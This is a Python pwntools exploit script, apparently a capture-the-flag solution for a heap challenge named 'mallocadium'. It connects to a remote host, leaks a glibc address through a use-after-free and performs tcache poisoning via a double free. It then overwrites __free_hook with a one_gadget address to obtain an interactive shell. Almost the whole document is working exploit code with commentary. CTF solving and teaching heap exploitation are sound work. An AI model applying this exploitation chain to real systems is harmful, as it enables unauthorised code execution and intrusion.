Solution for the "mallocadium" heap challenge: a dangling pointer left by the copy menu option gives a use-after-free libc leak and a tcache double free, which is used to overwrite __free_hook with a one_gadget address.
from pwn import *
# Debug level makes pwntools dump every byte sent and received, which is
# what you want while working out the heap layout; it is very noisy otherwise.
context.update(log_level="debug")
def alloc(id, size, data):
    """Menu option 1: malloc(*size*) under slot *id* and fill it with *data*.

    Every prompt is consumed with recvuntil() before the reply is sent, so the
    helper stays in lock-step with the remote menu. *data* is passed to
    sendline() unchanged, so it may be a packed pointer (p64) as well as text.
    Uses the module-level connection ``r``.
    """
    exchange = [
        ("Enter choice: ", "1"),
        ("Enter id: ", str(id)),
        ("Enter size of malloc: ", str(size)),
        ("Enter data to malloc: ", data),
    ]
    for prompt, reply in exchange:
        r.recvuntil(prompt)
        r.sendline(reply)
def copy(src, dst):
    """Menu option 2: copy slot *src* into slot *dst*.

    NOTE(review): the exploit below treats this as duplicating the chunk
    *pointer*, not the contents (the original author's comments call it
    "Duplicate A pointer"), so freeing one slot leaves the other dangling.
    That dangling pointer is the use-after-free / double-free primitive the
    whole chain rests on; confirm against the binary if anything misbehaves.
    Uses the module-level connection ``r``.
    """
    steps = (
        ("Enter choice: ", "2"),
        ("Enter id of malloc you want to copy: ", str(src)),
        ("Enter destination id: ", str(dst)),
    )
    for prompt, reply in steps:
        r.recvuntil(prompt)
        r.sendline(reply)
def free(id):
    """Menu option 3: free() the chunk held in slot *id*.

    The id prompt is matched as "Enter id:" (no trailing space, unlike
    alloc()); recvuntil() returns at the first match, so the leftover space is
    simply skipped by the next recvuntil(). Uses the module-level connection
    ``r``.
    """
    menu_choice = "3"
    r.recvuntil("Enter choice: ")
    r.sendline(menu_choice)
    r.recvuntil("Enter id:")
    r.sendline("%d" % id if isinstance(id, int) else str(id))
def use(id):
    """Menu option 4: print the contents of slot *id*.

    Called on a slot whose chunk has already been freed (see the libc leak
    below) this is the use-after-free read. The caller is responsible for
    consuming the "Data: " line that follows. Uses the module-level
    connection ``r``.
    """
    for prompt, reply in (("Enter choice: ", "4"), ("Enter id:", str(id))):
        r.recvuntil(prompt)
        r.sendline(reply)
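# Written for Python 2 pwntools (str payloads); under Python 3 the payloads
# and the leak handling below would need to become bytes.
r = remote("139.180.213.85", 10002)  # module-level; the menu helpers use it

# glibc offsets, hard-coded for the challenge's libc. 0x3ebca0 is main_arena+96
# (what an unsorted-bin chunk's fd/bk point at), 0x3ed8e8 is __free_hook and
# 0x4f322 is a one_gadget. Together with the 7-entry tcache and the undetected
# double free used below these look like glibc 2.27 (Ubuntu 18.04) -- TODO
# confirm against the shipped libc; from 2.29 on the tcache "key" check makes
# the back-to-back free(0)/free(1) abort instead.
MAIN_ARENA_96 = 0x3ebca0  # 4111520
FREE_HOOK_OFF = 0x3ed8e8  # 4118760
ONE_GADGET_OFF = 0x4f322

# Stage 1: libc leak via use-after-free.
# tcache keeps 7 chunks per size class, so the 8th 512-byte free() lands in
# the unsorted bin with fd/bk pointing into main_arena. Slot 13 is a copy of
# slot 12's pointer, so reading it after the frees prints that pointer.
for slot in range(5, 13):
    alloc(slot, 512, "1")
copy(12, 13)
for slot in range(5, 13):
    free(slot)
use(13)
r.recvuntil("Data: ")
# The printed pointer stops at its first NUL, hence the zero padding. A 0x0a
# byte inside the pointer would be cut off by recvuntil("\n") -- rerun if so.
leak = u64(r.recvuntil("\n").strip("\n").ljust(8, "\x00"))
libc = leak - MAIN_ARENA_96
# Sanity check before writing anywhere: a libc base is page aligned. Without
# it a mis-parsed leak would aim the tcache-poisoned write at a random address.
if libc & 0xfff:
    raise SystemExit("libc leak looks wrong: %#x (base %#x)" % (leak, libc))
free_hook = libc + FREE_HOOK_OFF
one_gadget = libc + ONE_GADGET_OFF
print("libc: " + hex(libc))

# Stage 2: tcache poisoning through a double free.
# Slot 1 is a pointer copy of slot 0 (chunk A). Freeing both puts A into the
# 0x90 tcache bin twice (A -> A). The first alloc() hands back A and writes
# free_hook into its fd, so the bin becomes A -> free_hook; the second alloc()
# pops A again, and the third returns __free_hook itself, where the one_gadget
# address is written.
alloc(0, 128, "1" * 128)
copy(0, 1)
free(0)
free(1)
alloc(20, 128, p64(free_hook))
alloc(21, 128, p64(free_hook))
alloc(22, 128, p64(one_gadget))
# Any free() now calls the hook; slot 22 is as good a trigger as any.
free(22)
r.interactive()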